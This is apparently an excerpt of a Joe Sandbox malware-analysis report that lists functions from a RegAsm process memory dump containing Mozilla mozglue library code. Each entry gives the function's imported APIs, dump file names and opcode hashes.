Function 6C1477D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1477FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C147829

Part of subcall function 6C11CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0E31A7), ref: 6C11CC45
Part of subcall function 6C11CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0E31A7), ref: 6C11CC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C14789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C1478CF

Part of subcall function 6C0E4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
Part of subcall function 6C0E4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97

Part of subcall function 6C0E4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C123EBD,6C123EBD,00000000), ref: 6C0E42A9

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 26308fd0f61f85439a630f1c01a47c06b48305f75ee19a4afbc48722af1d971c
Instruction ID: e886ba9edca492f0b5e5e3349bb5a2896133dcd9aae1297b2b98cff580839132
Opcode Fuzzy Hash: 26308fd0f61f85439a630f1c01a47c06b48305f75ee19a4afbc48722af1d971c
Instruction Fuzzy Hash: 7D415C719087469BD300DF29D48056AFBE4FF8A254F604A2EE4A987640DB70E559CBD2

Function 6C13DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DB86
??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C13DC0E
free.MOZGLUE(?), ref: 6C13DC2E
free.MOZGLUE(?), ref: 6C13DC40

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Impl@detail@mozilla@@Mutexfree
String ID:
API String ID: 3186548839-0
Opcode ID: e7f10fd2a23b4beefcba04cfcc7f04bcea4e0152ba26d9af16d954e80391790c
Instruction ID: 31aedb039f27e3832d078c6913f048e76c19eb4fd4a2c23d8d35870ca0b1dd01
Opcode Fuzzy Hash: e7f10fd2a23b4beefcba04cfcc7f04bcea4e0152ba26d9af16d954e80391790c
Instruction Fuzzy Hash: 564178B56147108FC710DF34C488B5ABBF6BFC9268F55882DE89A87741EB35E844CB91

Function 6C126470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C1282BC,?,?), ref: 6C12649B

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1264A9

Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C12653F
free.MOZGLUE(?), ref: 6C12655A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 25abb483c1d5990f6cbbb29702fa7e8f4353dedb08182b80d0842c912661502b
Instruction ID: f7b036774480c3c37630adabdb6d0df2550854266d3ba3d2d19decb145c54fbf
Opcode Fuzzy Hash: 25abb483c1d5990f6cbbb29702fa7e8f4353dedb08182b80d0842c912661502b
Instruction Fuzzy Hash: A6319EB5A043159FC700CF24D884A9ABBF4FF88354F00842EE89A87741DB34E919CB92

Function 6C13A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C13A315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C13A31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6C13A36A

Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2

Part of subcall function 6C132140: free.MOZGLUE(?,00000060,?,6C137D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C13215D

free.MOZGLUE(00000000), ref: 6C13A37C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: 462413dd385c85c4bb446ea4695b2bf2997e8ff87b98fd8e0b53c349d2c6a72f
Instruction ID: faa95637ac181d46a369e132b150b5e85657a25fb54a1b5dcc7f14315b31f2cb
Opcode Fuzzy Hash: 462413dd385c85c4bb446ea4695b2bf2997e8ff87b98fd8e0b53c349d2c6a72f
Instruction Fuzzy Hash: E421B071A002349BCB019F46D844B9EBBB9EF8A76CF058015E94D5F701DB36ED06C6D5

Function 6C11FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?), ref: 6C11FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?), ref: 6C11FFF5
free.MOZGLUE(?,?,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?), ref: 6C12001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C13D019,?,?,?,?,?,00000000,?,6C12DA31,00100000,?,?), ref: 6C12002A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 9b38649a5f514e88d93beb2c0f4db07cd94d1cb99ae214e09fc8f9b0765714e1
Instruction ID: e844dda767bc67a24dfa0482f3e719678595f8ef3bbd23c8f3aca24acaf8abf0
Opcode Fuzzy Hash: 9b38649a5f514e88d93beb2c0f4db07cd94d1cb99ae214e09fc8f9b0765714e1
Instruction Fuzzy Hash: 862106B2E002165FD7089E789CD48AFF7BAEB853247254738E535D7780EB70AD0586D0

Function 6C105B50 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,6C1056EE,?,00000001), ref: 6C105B85
EnterCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105B90
LeaveCriticalSection.KERNEL32(6C16F688,?,?,?,6C1056EE,?,00000001), ref: 6C105BD8
GetTickCount64.KERNEL32 ref: 6C105BE4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
String ID:
API String ID: 2796706680-0
Opcode ID: f744612a1d5f65614dd1161af0b0ec103fd13b80c5bbfbdb8afa55ca76e37358
Instruction ID: 1c609ab1c361beb6dd6b879a78d2fe44e2c4732fb5fc2f7fdadb477859334f12
Opcode Fuzzy Hash: f744612a1d5f65614dd1161af0b0ec103fd13b80c5bbfbdb8afa55ca76e37358
Instruction Fuzzy Hash: D821A2757053049FCB08CF29C95466ABBF6AF8A214F05C92EE4AA87790DB30A904DB91

Function 6C131B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C131B98
AcquireSRWLockExclusive.KERNEL32(?,?,6C131D96,00000000), ref: 6C131BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6C131D96,00000000), ref: 6C131BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C131C25

Part of subcall function 6C131C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6C13759E,?,?), ref: 6C131CB4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: f9847a5da05b4d075f06d6f027865509aa79d37324e16887e516a47de159a0fb
Instruction ID: 797f32b49479736967d6e7f583cce2cffba1dbaad44a159635104f7f28a67e91
Opcode Fuzzy Hash: f9847a5da05b4d075f06d6f027865509aa79d37324e16887e516a47de159a0fb
Instruction Fuzzy Hash: 9E21D370A042248BDB00DF26C8847BFBBB8AF9635CF20241DD91A6B741DB79E805C7D1

Function 6C147B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C147B51
__aulldiv.LIBCMT ref: 6C147B6C
__aulldiv.LIBCMT ref: 6C147B8B
__aulldiv.LIBCMT ref: 6C147BB1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: c4fe354646a9557b90d5fffc2a52e947968f5db7d16f9d813de2dab607eef7d9
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: 142130B1B00609AFD714DF7DCC85EA7B7F8EB86714B10853EE45ADB750E674A8048BA0

Function 6C147930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C0FBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C147A3F), ref: 6C0FBF11
Part of subcall function 6C0FBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C147A3F), ref: 6C0FBF5D
Part of subcall function 6C0FBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C147A3F), ref: 6C0FBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C147968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C14A264,6C14A264), ref: 6C14799A

Part of subcall function 6C0F9830: free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C1479E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C1479E8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: e14979db0e355b37641e07feae9d83f9896f6672256d6a47f2eec42f1f8dc3c9
Instruction ID: c5daffe5df76c63cf5a8f16f466185ebff159da3056fc4b59eda2b8ade691d7b
Opcode Fuzzy Hash: e14979db0e355b37641e07feae9d83f9896f6672256d6a47f2eec42f1f8dc3c9
Instruction Fuzzy Hash: 2C217A757043049BCB14DF18D888AAEBBE5EF89314F44882CE85A8B351CB30E909DB92

Function 6C147A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C0FBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C147A3F), ref: 6C0FBF11
Part of subcall function 6C0FBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C147A3F), ref: 6C0FBF5D
Part of subcall function 6C0FBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C147A3F), ref: 6C0FBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C147A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C147A7A

Part of subcall function 6C0F9830: free.MOZGLUE(?,?,?,6C147ABE), ref: 6C0F985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C147AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C147AC8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 15097f35bd0274ef450a5afdabeee40c1cbf70db4287b9d392c8038ee88bd025
Instruction ID: d9dfeee80c2440d048a9411d81aeca789ad857c0b55b3dbd98538b44eccac4e7
Opcode Fuzzy Hash: 15097f35bd0274ef450a5afdabeee40c1cbf70db4287b9d392c8038ee88bd025
Instruction Fuzzy Hash: B5217A757043049BCB14DF18D888AAEBBE5FF89314F00882CE85A8B351CB30E909DB92

Function 6C14AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C14AAF8
EnterCriticalSection.KERNEL32(6C16F770,?,6C10BF9F), ref: 6C14AB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB39
LeaveCriticalSection.KERNEL32(6C16F770,?,?,?,?,?,?,?,?,6C10BF9F), ref: 6C14AB6B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 55d8f80f7cf3dd152522f1d63aa372d208b80a8c2c6cd50f28ab4e8ff4dec82f
Instruction ID: a647beae03e826d386957a14b0b7815fc03ff362bff4bc37d91039bafeff46df
Opcode Fuzzy Hash: 55d8f80f7cf3dd152522f1d63aa372d208b80a8c2c6cd50f28ab4e8ff4dec82f
Instruction Fuzzy Hash: 1B114FB5A002198FCF00DFAAD888DABBBB5FF493187054439E945A7701E734E909CBB1

Function 6C0FB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0FB4F5
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0FB502
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C0FB542
free.MOZGLUE(?), ref: 6C0FB578

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 7722a19237f743636dc950293bef7e6019ccc43a34b2e7a101f91f6b9cad51f0
Instruction ID: 6d4a93ecfec6145a4a5fe9afabd9efecf09398070139856180138135b5b8d05c
Opcode Fuzzy Hash: 7722a19237f743636dc950293bef7e6019ccc43a34b2e7a101f91f6b9cad51f0
Instruction Fuzzy Hash: A311DF31A04B45C7D3128F2AC804765B3F1FF96718F14970AEC5953E01EBB4A1D69B90

Function 6C123DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C0EF20E,?), ref: 6C123DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C0EF20E,00000000,?), ref: 6C123DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C123E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C123E0E

Part of subcall function 6C11CC00: GetCurrentProcess.KERNEL32(?,?,6C0E31A7), ref: 6C11CC0D
Part of subcall function 6C11CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0E31A7), ref: 6C11CC16

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 44184faf45f52c17dd7cf0eb1d03468a56d83d5d49cd08639f401005e7dd74fd
Instruction ID: 79a9abbd79b0d9d7d374582d1e036871c29c6a5ff1f3dc728b3313a1f1e19e77
Opcode Fuzzy Hash: 44184faf45f52c17dd7cf0eb1d03468a56d83d5d49cd08639f401005e7dd74fd
Instruction Fuzzy Hash: 9DF012B56002087BDB00AB55DC41EBB376DEB46624F044060FE1857741D735BD6996F7

Function 6C132050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C13201B,?,?,?,?,?,?,?,6C131F8F,?,?), ref: 6C132064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13208E
free.MOZGLUE(?,?,?,00000000,?,6C13201B,?,?,?,?,?,?,?,6C131F8F,?,?), ref: 6C1320A3

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: aaf6825c1729b6d4d3663b99e745657345a25e63d5b0d41d034a91b55e1968e8
Instruction ID: c46922f1f3f6fe21ee42946de508064848386252ed895759fcc6836347c04a21
Opcode Fuzzy Hash: aaf6825c1729b6d4d3663b99e745657345a25e63d5b0d41d034a91b55e1968e8
Instruction Fuzzy Hash: BBF0E9712007109BC7119F17D88876BBBF8EF86328F10011AF54A87711CB75E80ADBD5

Function 6C12EB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C12EB11
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C12EB3C
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12EB5B
GetCurrentThreadId.KERNEL32 ref: 6C12EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C12EBAC
GetCurrentThreadId.KERNEL32 ref: 6C12EBC1
AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000), ref: 6C12EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C12EBE5
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,00000000), ref: 6C12EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C12EC46
CloseHandle.KERNEL32(?), ref: 6C12EC55
free.MOZGLUE(00000000), ref: 6C12EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C12EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C12EA9B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 70c5dfdecec5fbbcee9f7c1379df1daeedbc271e23e2b47ab6bd209b5a60f669
